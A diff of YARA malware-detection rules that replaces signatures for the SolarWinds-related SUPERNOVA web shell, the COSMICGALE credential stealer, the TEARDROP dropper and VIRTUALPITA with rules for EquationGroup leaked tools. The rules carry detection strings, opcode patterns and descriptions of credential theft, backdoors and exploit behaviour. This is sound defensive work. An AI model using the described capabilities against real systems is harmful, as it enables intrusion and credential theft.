-		$z = "C84vLUpO9UjMC04tykwDAA==" wide
+		$x1 = "[+] Ping returned Target architecture: %s - XOR Key: 0x%08X" fullword ascii
+		$x2 = "[.] Sending shellcode to inject DLL" fullword ascii
+		$x3 = "[-] Error setting ShellcodeFile name" fullword ascii
 
 	condition:
-		($a and $b and $c and $d and $e and $f and $h and $i ) or ( $j and $k and $l and $m and $n and $o and $p and $q and $r and $s and ( $aa or $ab ) ) or ( $t and $u and $v and $w and $x and $y and $z and ( $aa or $ab ) ) or ( $ac and $ad and $ae and $af and $ag and $ah and ( $am or $an ) ) or ( $ai and $aj and $ak and $al and ( $am or $an ) )
+		( uint16( 0 ) == 0x5a4d and filesize < 100KB and 1 of them )
 }
-
-rule SIGNATURE_BASE_APT_Webshell_SUPERNOVA_1 : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Erraticgophertouch_1_0_1 : FILE
 {
 	meta:
-		description = "SUPERNOVA is a .NET web shell backdoor masquerading as a legitimate SolarWinds web service handler. SUPERNOVA inspects and responds to HTTP requests with the appropriate HTTP query strings, Cookies, and/or HTML form values (e.g. named codes, class, method, and args). This rule is looking for specific strings and attributes related to SUPERNOVA."
-		author = "FireEye"
-		id = "73a27fa2-a846-5f4b-8182-064ac06c71a8"
-		date = "2020-12-14"
+		description = "Detects EquationGroup Tool - April Leak"
+		author = "Florian Roth (Nextron Systems)"
+		id = "9f03a4b6-69ab-5cef-876c-1e86ef2afe10"
+		date = "2017-04-15"
 		modified = "2023-12-05"
-		reference = "https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_solarwinds_sunburst.yar#L80-L99"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L1636-L1651"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "8471e6b3675e7e9ccfe5b81ab4c599668f2de528f3b179a675f50aa1fd7814b2"
-		score = 85
-		quality = 81
+		logic_hash = "08646f7887daddd8efac875bc7b111df7a52feae0a4b81bfd2d2ae7ef9453b5e"
+		score = 75
+		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "729eacf20fe71bd74e57a6b829b45113c5d45003933118b53835779f0b049bad"
 
 	strings:
-		$compile1 = "CompileAssemblyFromSource"
-		$compile2 = "CreateCompiler"
-		$context = "ProcessRequest"
-		$httpmodule = "IHttpHandler" ascii
-		$string1 = "clazz"
-		$string2 = "//NetPerfMon//images//NoLogo.gif" wide
-		$string3 = "SolarWinds" ascii nocase wide
+		$x1 = "[-] Unable to connect to broswer named pipe, target is NOT vulnerable" fullword ascii
+		$x2 = "[-] Unable to bind to Dimsvc RPC syntax, target is NOT vulnerable" fullword ascii
+		$x3 = "[+] Bound to Dimsvc, target IS vulnerable" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and uint32( uint32( 0x3C ) ) == 0x00004550 and filesize < 10KB and pe.imports ( "mscoree.dll" , "_CorDllMain" ) and $httpmodule and $context and all of ( $compile* ) and all of ( $string* )
+		( uint16( 0 ) == 0x5a4d and filesize < 30KB and 1 of them )
 }
-rule SIGNATURE_BASE_APT_Webshell_SUPERNOVA_2 : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Smbtouch_1_1_1 : FILE
 {
 	meta:
-		description = "This rule is looking for specific strings related to SUPERNOVA. SUPERNOVA is a .NET web shell backdoor masquerading as a legitimate SolarWinds web service handler. SUPERNOVA inspects and responds to HTTP requests with the appropriate HTTP query strings, Cookies, and/or HTML form values (e.g. named codes, class, method, and args)."
-		author = "FireEye"
-		id = "c39bf9ba-fd62-5619-92b6-1633375ef197"
-		date = "2020-12-14"
+		description = "Detects EquationGroup Tool - April Leak"
+		author = "Florian Roth (Nextron Systems)"
+		id = "225799cf-4d1b-54f8-8b76-b9ee1db80ce7"
+		date = "2017-04-15"
 		modified = "2023-12-05"
-		reference = "https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_solarwinds_sunburst.yar#L100-L118"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L1653-L1666"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "96e344bd2ba3ee07784852db3e9935352762c2fa7b6be88f00cac10a90706ffc"
-		score = 85
-		quality = 83
+		logic_hash = "b5eb9d45dfc47470236923a5b8174bc17733e4333db6f8bbe63c4f4bc913cf26"
+		score = 75
+		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "108243f61c53f00f8f1adcf67c387a8833f1a2149f063dd9ef29205c90a3c30a"
 
 	strings:
-		$dynamic = "DynamicRun"
-		$solar = "Solarwinds" nocase
-		$string1 = "codes"
-		$string2 = "clazz"
-		$string3 = "method"
-		$string4 = "args"
+		$x1 = "[+] Target is vulnerable to %d exploit%s" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and uint32( uint32( 0x3C ) ) == 0x00004550 and filesize < 10KB and 3 of ( $string* ) and $dynamic and $solar
+		( uint16( 0 ) == 0x5a4d and filesize < 400KB and all of them )
 }
-rule SIGNATURE_BASE_APT_Hacktool_PS1_COSMICGALE_1
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Educatedscholartouch_1_0_0 : FILE
 {
 	meta:
-		description = "This rule detects various unique strings related to COSMICGALE. COSMICGALE is a credential theft and reconnaissance PowerShell script that collects credentials using the publicly available Get-PassHashes routine. COSMICGALE clears log files, writes acquired data to a hard coded path, and encrypts the file with a password."
-		author = "FireEye"
-		id = "c094943c-288e-5835-8066-8e95a992c76c"
-		date = "2020-12-14"
+		description = "Detects EquationGroup Tool - April Leak"
+		author = "Florian Roth (Nextron Systems)"
+		id = "62205374-25a3-5b96-ad0a-a82c9a01a242"
+		date = "2017-04-15"
 		modified = "2023-12-05"
-		reference = "https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_solarwinds_sunburst.yar#L119-L140"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L1668-L1682"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "c7b4d3c29d57b8db8d21e3a436c83617bc3fe14e66ccc1500b33a3774f09ee12"
-		score = 85
-		quality = 40
-		tags = ""
+		logic_hash = "4c06fad158db8337ff768ad1553401ec31eee6b0d50333ce91a3a12e79d8981a"
+		score = 75
+		quality = 85
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "f4b958a0d3bb52cb34f18ea293d43fa301ceadb4a259d3503db912d0a9a1e4d8"
 
 	strings:
-		$sr1 = /\[byte\[\]\]@\([\x09\x20]{0,32}0xaa[\x09\x20]{0,32},[\x09\x20]{0,32}0xd3[\x09\x20]{0,32},[\x09\x20]{0,32}0xb4[\x09\x20]{0,32},[\x09\x20]{0,32}0x35[\x09\x20]{0,32},/ ascii nocase wide
-		$sr2 = /\[bitconverter\]::toint32\(\$\w{1,64}\[0x0c..0x0f\][\x09\x20]{0,32},[\x09\x20]{0,32}0\)[\x09\x20]{0,32}\+[\x09\x20]{0,32}0xcc\x3b/ ascii nocase wide
-		$sr3 = /\[byte\[\]\]\(\$\w{1,64}\.padright\(\d{1,2}\)\.substring\([\x09\x20]{0,32}0[\x09\x20]{0,32},[\x09\x20]{0,32}\d{1,2}\)\.tochararray\(\)\)/ ascii nocase wide
-		$ss1 = "[text.encoding]::ascii.getbytes(\"ntpassword\x600\");" ascii nocase wide
-		$ss2 = "system\\currentcontrolset\\control\\lsa\\$_" ascii nocase wide
-		$ss3 = "[security.cryptography.md5]::create()" ascii nocase wide
-		$ss4 = "[system.security.principal.windowsidentity]::getcurrent().name" ascii nocase wide
-		$ss5 = "out-file" ascii nocase wide
-		$ss6 = "convertto-securestring" ascii nocase wide
+		$x1 = "[!] A vulnerable target will not respond." fullword ascii
+		$x2 = "[-] Target NOT Vulernable" fullword ascii
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 30KB and 1 of them )
 }
-rule SIGNATURE_BASE_APT_Dropper_Raw64_TEARDROP_1
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Esteemaudittouch_2_1_0 : FILE
 {
 	meta:
-		description = "This rule looks for portions of the TEARDROP backdoor that are vital to how it functions. TEARDROP is a memory only dropper that can read files and registry keys, XOR decode an embedded payload, and load the payload into memory. TEARDROP persists as a Windows service and has been observed dropping Cobalt Strike BEACON into memory."
-		author = "FireEye"
-		id = "88adad58-ba16-5996-9ea8-ea356c3ed5b2"
-		date = "2020-12-14"
+		description = "Detects EquationGroup Tool - April Leak"
+		author = "Florian Roth (Nextron Systems)"
+		id = "bb66245e-1261-50bd-8666-75fc4c52ad84"
+		date = "2017-04-15"
 		modified = "2023-12-05"
-		reference = "https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_solarwinds_sunburst.yar#L141-L156"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L1684-L1698"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "6ab5197e7a1a123055b361a2ef79f8a77a7935606fccc8f163ea5914c94cd14d"
-		score = 85
+		logic_hash = "f4e62ec7a68115d5ff155ea94fb2c99b9177e928533338a111e531c694ff7b8f"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "f6b9caf503bb664b22c6d39c87620cc17bdb66cef4ccfa48c31f2a3ae13b4281"
 
 	strings:
-		$sb1 = { C7 44 24 ?? 80 00 00 00 [0-64] BA 00 00 00 80 [0-32] 48 8D 0D [4-32] FF 15 [4] 48 83 F8 FF [2-64] 41 B8 40 00 00 00 [0-64] FF 15 [4-5] 85 C0 7? ?? 80 3D [4] FF }
-		$sb2 = { 80 3D [4] D8 [2-32] 41 B8 04 00 00 00 [0-32] C7 44 24 ?? 4A 46 49 46 [0-32] E8 [4-5] 85 C0 [2-32] C6 05 [4] 6A C6 05 [4] 70 C6 05 [4] 65 C6 05 [4] 67 }
-		$sb3 = { BA [4] 48 89 ?? E8 [4] 41 B8 [4] 48 89 ?? 48 89 ?? E8 [4] 85 C0 7? [1-32] 8B 44 24 ?? 48 8B ?? 24 [1-16] 48 01 C8 [0-32] FF D0 }
+		$x1 = "[-] Touching the target failed!" fullword ascii
+		$x2 = "[-] OS fingerprint not complete - 0x%08x!" fullword ascii
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 200KB and 1 of them )
 }
-rule SIGNATURE_BASE_APT_Dropper_Win64_TEARDROP_1 : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Rpctouch_2_1_0 : FILE
 {
 	meta:
-		description = "This rule is intended match specific sequences of opcode found within TEARDROP, including those that decode the embedded payload. TEARDROP is a memory only dropper that can read files and registry keys, XOR decode an embedded payload, and load the payload into memory. TEARDROP persists as a Windows service and has been observed dropping Cobalt Strike BEACON into memory. (comment by Nextron: prone to False Positives)"
-		author = "FireEye"
-		id = "15dfdb74-5ca3-5bc6-be7a-730333b03ba5"
-		date = "2020-12-14"
+		description = "Detects EquationGroup Tool - April Leak"
+		author = "Florian Roth (Nextron Systems)"
+		id = "0691768b-ca98-5722-8468-737c4966d54d"
+		date = "2017-04-15"
 		modified = "2023-12-05"
-		reference = "https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_solarwinds_sunburst.yar#L157-L174"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L1700-L1714"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "a1fa9b9c700601d10cb77ec714b972f04308de615dfc519f680fc956227cc11d"
-		score = 70
+		logic_hash = "3ea1f30c0a2c91cc9ca2eec8eaab167c83f4f52c2732d03d1e7fb99e63986662"
+		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "7fe4c3cedfc98a3e994ca60579f91b8b88bf5ae8cf669baa0928508642c5a887"
 
 	strings:
-		$loc_4218FE24A5 = { 48 89 C8 45 0F B6 4C 0A 30 }
-		$loc_4218FE36CA = { 48 C1 E0 04 83 C3 01 48 01 E8 8B 48 28 8B 50 30 44 8B 40 2C 48 01 F1 4C 01 FA }
-		$loc_4218FE2747 = { C6 05 ?? ?? ?? ?? 6A C6 05 ?? ?? ?? ?? 70 C6 05 ?? ?? ?? ?? 65 C6 05 ?? ?? ?? ?? 67 }
-		$loc_5551D725A0 = { 48 89 C8 45 0F B6 4C 0A 30 48 89 CE 44 89 CF 48 F7 E3 48 C1 EA 05 48 8D 04 92 48 8D 04 42 48 C1 E0 04 48 29 C6 }
-		$loc_5551D726F6 = { 53 4F 46 54 57 41 52 45 ?? ?? ?? ?? 66 74 5C 43 ?? ?? ?? ?? 00 }
+		$x1 = "[*] Failed to detect OS / Service Pack on %s:%d" fullword ascii
+		$x2 = "[*] SMB String: %s (%s)" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint16( 0 ) == 0x5a4d and filesize < 80KB and 1 of them )
 }
-rule SIGNATURE_BASE_M_APT_VIRTUALPITA_1 : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Mofconfig_1_0_0 : FILE
 {
 	meta:
-		description = "Finds opcodes to set a port to bind on 2233, encompassing the setsockopt(), htons(), and bind() from 40973d to 409791 in fe34b7c071d96dac498b72a4a07cb246 (may produce some FPs - comment by Florian Roth)"
-		author = "Mandiant"
-		id = "bdfbe29a-f7db-50d9-a909-d4ca96cc0731"
-		date = "2023-11-25"
+		description = "Detects EquationGroup Tool - April Leak"
+		author = "Florian Roth (Nextron Systems)"
+		id = "d0d32e19-d004-5941-a5b3-0b4306565cf2"
+		date = "2017-04-15"
 		modified = "2023-12-05"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_unc3886_virtualpita.yar#L2-L15"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L1716-L1729"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "fe34b7c071d96dac498b72a4a07cb246"
-		logic_hash = "7641f964cc4a7671a9a3438aad1c653ef3fda3887313846cbe838b275a098190"
-		score = 60
-		quality = 45
+		logic_hash = "a922eb01efa52601b72c3d91a26585504fcf706a9ed16a36328f94f5871b0b24"
+		score = 75
+		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "c67a24fe2380331a101d27d6e69b82d968ccbae54a89a2629b6c135436d7bdb2"
 
 	strings:
-		$x = {8b ?? ?? 4? b8 04 00 00 00 [0 - 4] ba 02 00 00 00 be 01 00 00 00 [0 - 2] e8 ?? ?? ?? ?? 89 4? ?? 83 7? ?? 00 79 [0 - 50] ba 10 00 00 00 [0 - 10] e8}
+		$x1 = "[-] Get RemoteMOFTriggerPath error" fullword ascii
 
 	condition:
-		uint32( 0 ) == 0x464c457f and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 50KB and all of them )
 }
-rule SIGNATURE_BASE_M_APT_VIRTUALPITA_2 : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Easypi_Explodingcan : FILE
 {
 	meta:
-		description = "Finds opcodes to decode and parse the recieved data in the socket buffer in fe34b7c071d96dac498b72a4a07cb246.  Opcodes from 401a36 to 401adc"
-		author = "Mandiant"
-		id = "6a59cc54-e1a0-594f-9efb-af63d5c05259"
-		date = "2023-12-05"
+		description = "Detects EquationGroup Tool - April Leak"
+		author = "Florian Roth (Nextron Systems)"
+		id = "53d4ebf1-cce3-5fc8-8304-064b4113c9d7"
+		date = "2017-04-15"
 		modified = "2023-12-05"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_unc3886_virtualpita.yar#L17-L28"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L1731-L1747"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "fe34b7c071d96dac498b72a4a07cb246"
-		logic_hash = "56a3e1b13f0955a780f882e62003f721e409a1fdf61120dd295941605dbf21a4"
+		logic_hash = "c5978d8cbffde2339cadd84f44d1df24e76f298a2f05bd9a6565246bfae1b1e3"
 		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "dc1ddad7e8801b5e37748ec40531a105ba359654ffe8bdb069bd29fb0b5afd94"
+		hash2 = "97af543cf1fb59d21ba5ec6cb2f88c8c79c835f19c8f659057d2f58c321a0ad4"
 
 	strings:
-		$x = {85 c0 74 ?? c7 05 ?? ?? ?? ?? fb ff ff ff c7 8? ?? ?? ?? ?? 00 00 00 00 e9 ?? ?? ?? ?? 4? 8b 05 ?? ?? ?? ?? 4? 83 c0 01 4? 89 05 ?? ?? ?? ?? c7 4? ?? 00 00 00 00 e9 ?? ?? ?? ?? 8b 4? ?? 4? 98 4? 8d 9? ?? ?? ?? ?? 4? 8d ?? e0 4? 8b 0? 4? 89 0? 4? 8b 4? ?? 4? 89 4? ?? 8b 4? ?? 4? 98 4? 8d b? ?? ?? ?? ?? b? ?? ?? ?? ?? e8 ?? ?? ?? ?? c7 4? ?? 00 00 00 00 eb ?? 8b 4? ?? 8b 4? ?? 01 c1 8b 4? ?? 03 4? ?? 4? 98 0f b6 9? ?? ?? ?? ?? 8b 4? ?? 4? 98 0f b6 8? ?? ?? ?? ?? 31 c2 4? 63 c1 88 9? ?? ?? ?? ?? 83 4? ?? 01}
+		$x1 = "[-] %s - Target might not be in a usable state." fullword ascii
+		$x2 = "[*] Exploiting Target" fullword ascii
+		$x3 = "[-] Encoding Exploit Payload failed!" fullword ascii
 
 	condition:
-		uint32( 0 ) == 0x464c457f and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 100KB and 1 of them )
 }
-rule SIGNATURE_BASE_M_APT_VIRTUALPITA_3 : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Eclipsedwingtouch_1_0_4 : FILE
 {
 	meta:
-		description = "Finds opcodes from 409dd8 to 409e46 in fe34b7c071d96dac498b72a4a07cb246 to set the HISTFILE environment variable to 'F' with a putenv() after loading each character individually."
-		author = "Mandiant"
-		id = "29ea2db0-4ab2-5e9c-8d42-7590ceabf99a"
-		date = "2023-12-05"
+		description = "Detects EquationGroup Tool - April Leak"
+		author = "Florian Roth (Nextron Systems)"
+		id = "87e46fcd-d3e5-506a-97f3-8a18a7ba8042"
+		date = "2017-04-15"
 		modified = "2023-12-05"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_unc3886_virtualpita.yar#L30-L41"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L1749-L1763"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "fe34b7c071d96dac498b72a4a07cb246"
-		logic_hash = "6f44d516b3cbe54542ae0991aad49274fc4728570e9498b319fc98840ceb7d7d"
+		logic_hash = "4707dbbb302b9b2192bdd23e4b64e25b5b2f49c3dd7951905a07cb5b54d524d9"
 		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "46da99d80fc3eae5d1d5ab2da02ed7e61416e1eafeb23f37b180c46e9eff8a1c"
 
 	strings:
-		$x = {4? 8b 4? ?? c6 00 48 4? 8b 4? ?? 4? 83 c0 05 c6 00 49 4? 8b 4? ?? 4? 83 c0 01 c6 00 49 4? 8b 4? ?? 4? 83 c0 06 c6 00 4c 4? 8b 4? ?? 4? 83 c0 02 c6 00 53 4? 8b 4? ?? 4? 83 c0 07 c6 00 45 4? 8b 4? ?? 4? 83 c0 03 c6 00 54 4? 8b 4? ?? 4? 83 c0 08 c6 00 3d 4? 8b 4? ?? 4? 83 c0 04 c6 00 46 4? 8b 4? ?? 4? 83 c0 09 c6 00 00 4? 8b 7? ?? e8}
+		$x1 = "[-] The target is NOT vulnerable" fullword ascii
+		$x2 = "[+] The target IS VULNERABLE" fullword ascii
 
 	condition:
-		uint32( 0 ) == 0x464c457f and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 50KB and 1 of them )
 }
-rule SIGNATURE_BASE_M_APT_VIRTUALPITA_4 : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Iistouch_1_2_2 : FILE
 {
 	meta:
-		description = "Finds opcodes from 401f1c to 401f4f in fe34b7c071d96dac498b72a4a07cb246 to decode text with multiple XORs"
-		author = "Mandiant"
-		id = "58d4db75-fcd5-50c2-93ba-a8a4718ac0f6"
-		date = "2023-12-05"
+		description = "Detects EquationGroup Tool - April Leak"
+		author = "Florian Roth (Nextron Systems)"
+		id = "dd6ea8cc-505d-5c7c-a7ea-c5fa4f14b5ee"
+		date = "2017-04-15"
 		modified = "2023-12-05"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_unc3886_virtualpita.yar#L43-L55"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L1765-L1779"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "fe34b7c071d96dac498b72a4a07cb246"
-		logic_hash = "aaf2ff682c619d2a254fe069d477654a161658db6315239f1b956141b6a72c01"
+		logic_hash = "f4f5e17d3777d6ae8bfd0646eeffcd631331e4d8966f5124ebc9352438dc790f"
 		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "c433507d393a8aa270576790acb3e995e22f4ded886eb9377116012e247a07c6"
 
 	strings:
-		$x = {4? 8b 4? ?? 4? 83 c1 30 4? 8b 4? ?? 4? 8b 10 8b 4? ?? 4? 98 4? 8b 04 ?? ?? ?? ?? ?? 4? 31 c2 4? 8b 4? ?? 4? 83 c0 28 4? 8b 00 4? c1 e8 10 0f b6 c0 4? 98 4? 8b 04}
+		$x1 = "[-] Are you being redirectect? Need to retarget?" fullword ascii
+		$x2 = "[+] IIS Target OS: %s" fullword ascii
 
 	condition:
-		uint32( 0 ) == 0x464c457f and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 60KB and 1 of them )
 }
-rule SIGNATURE_BASE_M_Hunting_Python_Backdoor_Commandparser_1 : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Namedpipetouch_2_0_0 : FILE
 {
 	meta:
-		description = "Finds strings indicative of the vmsyslog.py python backdoor."
-		author = "Mandiant"
-		id = "15cbca01-24e6-5538-bcfd-c3222337aaf5"
-		date = "2023-12-05"
+		description = "Detects EquationGroup Tool - April Leak"
+		author = "Florian Roth (Nextron Systems)"
+		id = "0a5519d7-9811-5159-8df2-0cb2995d5085"
+		date = "2017-04-15"
 		modified = "2023-12-05"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_unc3886_virtualpita.yar#L57-L73"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L1781-L1800"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "61ab3f6401d60ec36cd3ac980a8deb75"
-		logic_hash = "eefc255079e914ac81d53baf4ae159052bfda4c670e8300306c0899b3ad00a48"
-		score = 50
-		quality = 60
+		logic_hash = "63d4395db4672b7a146dbd285e42344fb895b38f67fa9f7885b73855d7211190"
+		score = 75
+		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "cb5849fcbc473c7df886828d225293ffbd8ee58e221d03b840fd212baeda6e89"
+		hash2 = "043d1c9aae6be65f06ab6f0b923e173a96b536cf84e57bfd7eeb9034cd1df8ea"
 
 	strings:
-		$key1 = "self.conn.readInt8()" ascii
-		$key2 = "upload" ascii
-		$key3 = "download" ascii
-		$key4 = "shell" ascii
-		$key5 = "execute" ascii
-		$re1 = /def\srun.{,20}command\s?=\s?self\.conn\.readInt8\(\).{,75}upload.{,75}download.{,75}shell.{,75}execute/s
+		$s1 = "[*] Summary: %d pipes found" fullword ascii
+		$s3 = "[+] Testing %d pipes" fullword ascii
+		$s6 = "[-] Error on SMB startup, aborting" fullword ascii
+		$s12 = "92a761c29b946aa458876ff78375e0e28bc8acb0" fullword ascii
+		$op1 = { 68 10 10 40 00 56 e8 e1 }
 
 	condition:
-		filesize < 200KB and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 40KB and 2 of them )
 }
-rule SIGNATURE_BASE_Poisonivy_Sample_APT : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Easybee_1_0_1 : FILE
 {
 	meta:
-		description = "Detects a PoisonIvy APT malware group"
+		description = "Detects EquationGroup Tool - April Leak"
 		author = "Florian Roth (Nextron Systems)"
-		id = "8d3b8222-8949-57dc-99b7-092189416efd"
-		date = "2015-06-03"
+		id = "f170ed34-f7d1-5eb2-9400-4308b6b39388"
+		date = "2017-04-15"
 		modified = "2023-12-05"
-		reference = "VT Analysis"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_poisonivy.yar#L2-L21"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L1802-L1816"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "b874b76ff7b281c8baa80e4a71fc9be514093c70"
-		logic_hash = "938df757d1f5ee1028d61dbc2ab76a33c788a44f87cb0d84626420e20bfb5fa4"
-		score = 70
+		logic_hash = "e3488a1d686b9ad468553cfe2c939e70ea6b9a21409df8b06bb54418495576ec"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "59c17d6cb564edd32c770cd56b5026e4797cf9169ff549735021053268b31611"
